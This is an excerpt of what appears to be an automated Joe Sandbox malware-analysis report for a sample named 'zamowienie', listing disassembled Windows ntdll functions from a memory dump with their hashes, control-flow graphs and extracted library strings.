                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 630b11674f058e79014250baff8b908e9f8735e5a4310f0dc459b0a0bfd6b357
                                                                                                                                              • Instruction ID: a3473c9356413c551a9553e1634481d2bb120311fff5fc8a605f6d5786bf5f58
                                                                                                                                              • Opcode Fuzzy Hash: 630b11674f058e79014250baff8b908e9f8735e5a4310f0dc459b0a0bfd6b357
                                                                                                                                              • Instruction Fuzzy Hash: 0A90023524140813D1807158C40464A04054BD1305F99C416A0026628DCE55CB5E77A2
                                                                                                                                              Function 34F32BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ac5eaf54cf61a3d043bad8999f6847f45ec1e45f99b87f1a9ace3a28ee8b8c87
                                                                                                                                              • Instruction ID: 56a4416257d4e01c7657a49822732572eefa07c4e386935e240d1389af140a5d
                                                                                                                                              • Opcode Fuzzy Hash: ac5eaf54cf61a3d043bad8999f6847f45ec1e45f99b87f1a9ace3a28ee8b8c87
                                                                                                                                              • Instruction Fuzzy Hash: B590023524544853D1407158C404A4604154BD0309F59C412A0065668D9A65CE5AB662
                                                                                                                                              Function 34F32BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 94f581617c3e9a98cab6ebd8563f8a565fb7628f42821acd01346f2f98a5cb40
                                                                                                                                              • Instruction ID: 6496c2246e119d545867f59893dd6e8ccc9acfbe452f4f9957507c74af657dba
                                                                                                                                              • Opcode Fuzzy Hash: 94f581617c3e9a98cab6ebd8563f8a565fb7628f42821acd01346f2f98a5cb40
                                                                                                                                              • Instruction Fuzzy Hash: 9090023564540813D1507158C41474604054BD0305F59C412A0025628D8B95CB5A76A2
                                                                                                                                              Function 34F32B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5962f03702caa3fdb2e1d3846cdaad74a992b0fa245e6245f4cb8a52b9663aa6
                                                                                                                                              • Instruction ID: 0eb882cc46f6303268fd5a73c1006b0e8f11e5fa4f00c19738698de43d4c6a68
                                                                                                                                              • Opcode Fuzzy Hash: 5962f03702caa3fdb2e1d3846cdaad74a992b0fa245e6245f4cb8a52b9663aa6
                                                                                                                                              • Instruction Fuzzy Hash: D490023524140813D1047158C80468604054BD0305F59C412A6025629E9AA5C9967132
                                                                                                                                              Function 34F32B60 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f3e99d9033ed64f31a57dd2b2ff8f924710bbeeedaf5d23f7662522113909cf5
                                                                                                                                              • Instruction ID: 51166e864b5cdc303a176c32e2693f8094a63bbf46dba3da42f8a76971db2011
                                                                                                                                              • Opcode Fuzzy Hash: f3e99d9033ed64f31a57dd2b2ff8f924710bbeeedaf5d23f7662522113909cf5
                                                                                                                                              • Instruction Fuzzy Hash: 9D9002652424001341057158C414616440A4BE0205B59C422E1015564DC965C9966126
                                                                                                                                              Function 34F32C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                              • Instruction ID: 477589534e8f3d9b00cfd65197783f0f7a63718165491d348e75be0972e07440
                                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Function 34F32890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1126 34f32890-34f328b3 1127 34f6a4bc-34f6a4c0 1126->1127 1128 34f328b9-34f328cc 1126->1128 1127->1128 1129 34f6a4c6-34f6a4ca 1127->1129 1130 34f328ce-34f328d7 1128->1130 1131 34f328dd-34f328df 1128->1131 1129->1128 1132 34f6a4d0-34f6a4d4 1129->1132 1130->1131 1133 34f6a57e-34f6a585 1130->1133 1134 34f328e1-34f328e5 1131->1134 1132->1128 1135 34f6a4da-34f6a4de 1132->1135 1133->1131 1136 34f328eb-34f328fa 1134->1136 1137 34f32988-34f3298e 1134->1137 1135->1128 1138 34f6a4e4-34f6a4eb 1135->1138 1139 34f32900-34f32905 1136->1139 1140 34f6a58a-34f6a58d 1136->1140 1141 34f32908-34f3290c 1137->1141 1142 34f6a564-34f6a56c 1138->1142 1143 34f6a4ed-34f6a4f4 1138->1143 1139->1141 1140->1141 1141->1134 1144 34f3290e-34f3291b 1141->1144 1142->1128 1145 34f6a572-34f6a576 1142->1145 1146 34f6a4f6-34f6a4fe 1143->1146 1147 34f6a50b 1143->1147 1148 34f32921 1144->1148 1149 34f6a592-34f6a599 1144->1149 1145->1128 1150 34f6a57c call 34f40050 1145->1150 1146->1128 1151 34f6a504-34f6a509 1146->1151 1152 34f6a510-34f6a536 call 34f40050 1147->1152 1153 34f32924-34f32926 1148->1153 1155 34f6a5a1-34f6a5c9 call 34f40050 1149->1155 1168 34f6a55d-34f6a55f 1150->1168 1151->1152 1152->1168 1157 34f32993-34f32995 1153->1157 1158 34f32928-34f3292a 1153->1158 1157->1158 1164 34f32997-34f329b1 call 34f40050 1157->1164 1159 34f32946-34f32966 call 34f40050 1158->1159 1160 34f3292c-34f3292e 1158->1160 1175 34f32969-34f32974 1159->1175 1160->1159 1165 34f32930-34f32944 call 34f40050 1160->1165 1164->1175 1165->1159 1171 34f32981-34f32985 1168->1171 1175->1153 1177 34f32976-34f32979 1175->1177 1177->1155 1178 34f3297f 1177->1178 1178->1171
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                              • Opcode ID: 88e009b748dcf919e3cdb223d3cd987a1603dd8b5c8f1042923e8136c232923e
                                                                                                                                              • Instruction ID: 086550a34b5cfe3839cd16ad8c9334e2aa8bd0c5b96c39e8a8da4463775a0692
                                                                                                                                              • Opcode Fuzzy Hash: 88e009b748dcf919e3cdb223d3cd987a1603dd8b5c8f1042923e8136c232923e
                                                                                                                                              • Instruction Fuzzy Hash: 53514CB6F01216BFEB00DF58C88057EF7B8FB082447598A6AE465D3241D734DE428BE0
                                                                                                                                              Function 34FA2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1179 34fa2410-34fa2433 1180 34fa2439-34fa243d 1179->1180 1181 34fa24ec-34fa24ff 1179->1181 1180->1181 1182 34fa2443-34fa2447 1180->1182 1183 34fa2513-34fa2515 1181->1183 1184 34fa2501-34fa250a 1181->1184 1182->1181 1185 34fa244d-34fa2451 1182->1185 1187 34fa2517-34fa251b 1183->1187 1184->1183 1186 34fa250c 1184->1186 1185->1181 1188 34fa2457-34fa245b 1185->1188 1186->1183 1189 34fa2538-34fa253e 1187->1189 1190 34fa251d-34fa252c 1187->1190 1188->1181 1192 34fa2461-34fa2468 1188->1192 1191 34fa2543-34fa2547 1189->1191 1193 34fa252e-34fa2536 1190->1193 1194 34fa2540 1190->1194 1191->1187 1195 34fa2549-34fa2556 1191->1195 1196 34fa246a-34fa2471 1192->1196 1197 34fa24b6-34fa24be 1192->1197 1193->1191 1194->1191 1198 34fa2558-34fa2562 1195->1198 1199 34fa2564 1195->1199 1201 34fa2473-34fa247b 1196->1201 1202 34fa2484 1196->1202 1197->1181 1200 34fa24c0-34fa24c4 1197->1200 1204 34fa2567-34fa2569 1198->1204 1199->1204 1200->1181 1205 34fa24c6-34fa24ea call 34f40510 1200->1205 1201->1181 1206 34fa247d-34fa2482 1201->1206 1203 34fa2489-34fa24ab call 34f40510 1202->1203 1217 34fa24ae-34fa24b1 1203->1217 1208 34fa256b-34fa256d 1204->1208 1209 34fa258d-34fa258f 1204->1209 1205->1217 1206->1203 1208->1209 1212 34fa256f-34fa258b call 34f40510 1208->1212 1214 34fa25ae-34fa25d0 call 34f40510 1209->1214 1215 34fa2591-34fa2593 1209->1215 1224 34fa25d3-34fa25df 1212->1224 1214->1224 1215->1214 1219 34fa2595-34fa25ab call 34f40510 1215->1219 1221 34fa2615-34fa2619 1217->1221 1219->1214 1224->1204 1226 34fa25e1-34fa25e4 1224->1226 1227 34fa2613 1226->1227 1228 34fa25e6-34fa2610 call 34f40510 1226->1228 1227->1221 1228->1227
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                              • Opcode ID: 121861e22643568a61a536059ebca5ccdb722c378fbeefba84a839e06516caed
                                                                                                                                              • Instruction ID: fe508a305a2508b6fe99d108a6ee220cb4e14ed2748fb9b265d8de1835c57476
                                                                                                                                              • Opcode Fuzzy Hash: 121861e22643568a61a536059ebca5ccdb722c378fbeefba84a839e06516caed
                                                                                                                                              • Instruction Fuzzy Hash: B9513775B00645AFEB20CF5CC89087FBBF9EF44240B498C59E495C7741EA70EA518F60
                                                                                                                                              Function 34FCA670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1428 34fca670-34fca6e9 call 34f02410 * 2 RtlDebugPrintTimes 1434 34fca89f-34fca8c4 call 34f025b0 * 2 call 34f34c30 1428->1434 1435 34fca6ef-34fca6fa 1428->1435 1437 34fca6fc-34fca709 1435->1437 1438 34fca724 1435->1438 1440 34fca70f-34fca715 1437->1440 1441 34fca70b-34fca70d 1437->1441 1442 34fca728-34fca734 1438->1442 1444 34fca71b-34fca722 1440->1444 1445 34fca7f3-34fca7f5 1440->1445 1441->1440 1446 34fca741-34fca743 1442->1446 1444->1442 1448 34fca81f-34fca821 1445->1448 1449 34fca745-34fca747 1446->1449 1450 34fca736-34fca73c 1446->1450 1454 34fca755-34fca77d RtlDebugPrintTimes 1448->1454 1455 34fca827-34fca834 1448->1455 1449->1448 1452 34fca74c-34fca750 1450->1452 1453 34fca73e 1450->1453 1459 34fca86c-34fca86e 1452->1459 1453->1446 1454->1434 1468 34fca783-34fca7a0 RtlDebugPrintTimes 1454->1468 1456 34fca85a-34fca866 1455->1456 1457 34fca836-34fca843 1455->1457 1462 34fca87b-34fca87d 1456->1462 1460 34fca84b-34fca851 1457->1460 1461 34fca845-34fca849 1457->1461 1459->1448 1464 34fca96b-34fca96d 1460->1464 1465 34fca857 1460->1465 1461->1460 1466 34fca87f-34fca881 1462->1466 1467 34fca870-34fca876 1462->1467 1469 34fca883-34fca889 1464->1469 1465->1456 1466->1469 1470 34fca878 1467->1470 1471 34fca8c7-34fca8cb 1467->1471 1468->1434 1476 34fca7a6-34fca7cc RtlDebugPrintTimes 1468->1476 1474 34fca88b-34fca89d RtlDebugPrintTimes 1469->1474 1475 34fca8d0-34fca8f4 RtlDebugPrintTimes 1469->1475 1470->1462 1473 34fca99f-34fca9a1 1471->1473 1474->1434 1475->1434 1480 34fca8f6-34fca913 RtlDebugPrintTimes 1475->1480 1476->1434 1481 34fca7d2-34fca7d4 1476->1481 1480->1434 1488 34fca915-34fca944 RtlDebugPrintTimes 1480->1488 1482 34fca7d6-34fca7e3 1481->1482 1483 34fca7f7-34fca80a 1481->1483 1485 34fca7eb-34fca7f1 1482->1485 1486 34fca7e5-34fca7e9 1482->1486 1487 34fca817-34fca819 1483->1487 1485->1445 1485->1483 1486->1485 1489 34fca80c-34fca812 1487->1489 1490 34fca81b-34fca81d 1487->1490 1488->1434 1494 34fca94a-34fca94c 1488->1494 1491 34fca868-34fca86a 1489->1491 1492 34fca814 1489->1492 1490->1448 1491->1459 1492->1487 1495 34fca94e-34fca95b 1494->1495 1496 34fca972-34fca985 1494->1496 1497 34fca95d-34fca961 1495->1497 1498 34fca963-34fca969 1495->1498 1499 34fca992-34fca994 1496->1499 1497->1498 1498->1464 1498->1496 1500 34fca996 1499->1500 1501 34fca987-34fca98d 1499->1501 1500->1466 1502 34fca98f 1501->1502 1503 34fca99b-34fca99d 1501->1503 1502->1499 1503->1473
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: HEAP:
                                                                                                                                              • API String ID: 3446177414-2466845122
                                                                                                                                              • Opcode ID: a987c7678fa030cea9c927eb984845c919a6295a8bd377dbe2962e85a324a52e
                                                                                                                                              • Instruction ID: 02a6447f118eb58c9bc3d31e41fe6a4098777a38a1abf7d0cb4c89c21930754c
                                                                                                                                              • Opcode Fuzzy Hash: a987c7678fa030cea9c927eb984845c919a6295a8bd377dbe2962e85a324a52e
                                                                                                                                              • Instruction Fuzzy Hash: 90A179B6A143128FD705CE28C890B1AB7E5FF88750F194A6DE945DB390EB30EC46CB91
                                                                                                                                              Function 34F27630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1504 34f27630-34f27651 1505 34f27653-34f2766f call 34efe660 1504->1505 1506 34f2768b-34f27699 call 34f34c30 1504->1506 1511 34f27675-34f27682 1505->1511 1512 34f64638 1505->1512 1513 34f27684 1511->1513 1514 34f2769a-34f276a9 call 34f27818 1511->1514 1515 34f6463f-34f64645 1512->1515 1513->1506 1520 34f27701-34f2770a 1514->1520 1521 34f276ab-34f276c1 call 34f277cd 1514->1521 1518 34f276c7-34f276d0 call 34f27728 1515->1518 1519 34f6464b-34f646b8 call 34f7f290 call 34f39020 RtlDebugPrintTimes BaseQueryModuleData 1515->1519 1518->1520 1529 34f276d2 1518->1529 1519->1518 1536 34f646be-34f646c6 1519->1536 1524 34f276d8-34f276e1 1520->1524 1521->1515 1521->1518 1531 34f276e3-34f276f2 call 34f2771b 1524->1531 1532 34f2770c-34f2770e 1524->1532 1529->1524 1533 34f276f4-34f276f6 1531->1533 1532->1533 1538 34f27710-34f27719 1533->1538 1539 34f276f8-34f276fa 1533->1539 1536->1518 1540 34f646cc-34f646d3 1536->1540 1538->1539 1539->1513 1541 34f276fc 1539->1541 1540->1518 1542 34f646d9-34f646e4 1540->1542 1543 34f647be-34f647d0 call 34f32c50 1541->1543 1545 34f646ea-34f64723 call 34f7f290 call 34f3aaa0 1542->1545 1546 34f647b9 call 34f34d48 1542->1546 1543->1513 1553 34f64725-34f64736 call 34f7f290 1545->1553 1554 34f6473b-34f6476b call 34f7f290 1545->1554 1546->1543 1553->1520 1554->1518 1559 34f64771-34f6477f call 34f3a770 1554->1559 1562 34f64786-34f647a3 call 34f7f290 call 34f6cf9e 1559->1562 1563 34f64781-34f64783 1559->1563 1562->1518 1568 34f647a9-34f647b2 1562->1568 1563->1562 1568->1559 1569 34f647b4 1568->1569 1569->1518
                                                                                                                                              Strings
                                                                                                                                              • ExecuteOptions, xrefs: 34F646A0
                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 34F646FC
                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 34F64787
                                                                                                                                              • Execute=1, xrefs: 34F64713
                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34F64655
                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 34F64742
                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34F64725
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                              • Opcode ID: 192f85d7522c66212967efb17e28284c87ba258f87091bf9444287594d0df87c
                                                                                                                                              • Instruction ID: 9e000392c134c81a27a1989c9e28998e11d14ef701456685fe6b617c37f7f690
                                                                                                                                              • Opcode Fuzzy Hash: 192f85d7522c66212967efb17e28284c87ba258f87091bf9444287594d0df87c
                                                                                                                                              • Instruction Fuzzy Hash: 29510879601219AFFB10EAA4DC85FA97BF8EF04344F5808EDD505A7190EB319A47CF54
                                                                                                                                              Function 34F0A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 34F579D0, 34F579F5
                                                                                                                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 34F57AE6
                                                                                                                                              • SsHd, xrefs: 34F0A3E4
                                                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34F579FA
                                                                                                                                              • Actx , xrefs: 34F57A0C, 34F57A73
                                                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34F579D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                              • API String ID: 0-1988757188
                                                                                                                                              • Opcode ID: 19e34db698bf4d5e76d1e17f764c0b7a943b1272c9b8d6b7e319d4669ad0d830
                                                                                                                                              • Instruction ID: 7ce803b03a460ab984fdd4c8d7fcf6eb689402d95707dae87374889a6b1f15c3
                                                                                                                                              • Opcode Fuzzy Hash: 19e34db698bf4d5e76d1e17f764c0b7a943b1272c9b8d6b7e319d4669ad0d830
                                                                                                                                              • Instruction Fuzzy Hash: A2E1AF79A043028FE714CE24C884B1AB7E5FBD4354F588F6DE855CB2A0DB31D94A9F92
                                                                                                                                              Function 34F0D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 34F59341, 34F59366
                                                                                                                                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34F59565
                                                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34F5936B
                                                                                                                                              • Actx , xrefs: 34F59508
                                                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34F59346
                                                                                                                                              • GsHd, xrefs: 34F0D874
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                              • API String ID: 3446177414-2196497285
                                                                                                                                              • Opcode ID: 64f63fc708353bfd3009394248b1abfaaacb436ae0c4e39147496a92fedbe133
                                                                                                                                              • Instruction ID: a6aaa0fe6aee788a710e3f2e04bef62ebcac6f11cf75e152e11525fff30c6d7f
                                                                                                                                              • Opcode Fuzzy Hash: 64f63fc708353bfd3009394248b1abfaaacb436ae0c4e39147496a92fedbe133
                                                                                                                                              • Instruction Fuzzy Hash: 5CE1B075604302CFE714CF64C880B1AB7E9BF88358F488E6DE8958B291D771E946DF92
                                                                                                                                              Function 34EE645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlDebugPrintTimes.NTDLL ref: 34EE656C
                                                                                                                                                • Part of subcall function 34EE65B5: RtlDebugPrintTimes.NTDLL ref: 34EE6664
                                                                                                                                                • Part of subcall function 34EE65B5: RtlDebugPrintTimes.NTDLL ref: 34EE66AF
                                                                                                                                              Strings
                                                                                                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 34F49A01
                                                                                                                                              • LdrpInitShimEngine, xrefs: 34F499F4, 34F49A07, 34F49A30
